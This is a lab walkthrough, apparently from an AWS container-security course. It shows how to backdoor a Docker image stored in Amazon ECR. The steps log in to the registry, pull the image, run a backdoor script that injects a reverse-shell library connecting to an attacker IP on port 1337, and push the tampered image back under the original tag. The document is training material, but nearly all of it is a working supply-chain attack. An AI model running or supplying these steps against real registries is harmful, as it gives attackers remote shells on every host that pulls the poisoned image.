Backdooring a Docker Image

⚡ Attention ⚡

💡 Conitnue using same terminal. Do not switch terminals unless stated below, or you'll need to re-export environment variables.

Change directory to jenkins_cve, to make make sure folder structure is as per lab steps.

cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve

Set the repo

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
export image_tag="latest"

Set the default region using one-liner before proceeding further.

This will set the default region based on output.

Login to AWS ECR.

export AWS_DEFAULT_REGION=$(echo "$repo:$image_tag" | awk -F. '{print $4}')

export aws_account_id=$(aws sts get-caller-identity --query "Account" --output text) && aws ecr get-login-password | docker login --username AWS --password-stdin $aws_account_id.dkr.ecr.$AWS_DEFAULT_REGION.amazonaws.com

Pull the image to be backdoored.

docker pull "$repo:$image_tag"

Generate the backdoor the image.

python3 ../solution/backdoor.py \
  --input "$repo:$image_tag" \
  --output "$repo:$image_tag" \
  --listener "$ATTACKER_PUBLIC_IP" \
  --port 1337 \
  --shell-url "https://github.com/cr0hn/dockerscan/raw/master/dockerscan/actions/image/modifiers/shells/reverse_shell.so"

alt text

Push the backdoor image.

docker push $repo:$image_tag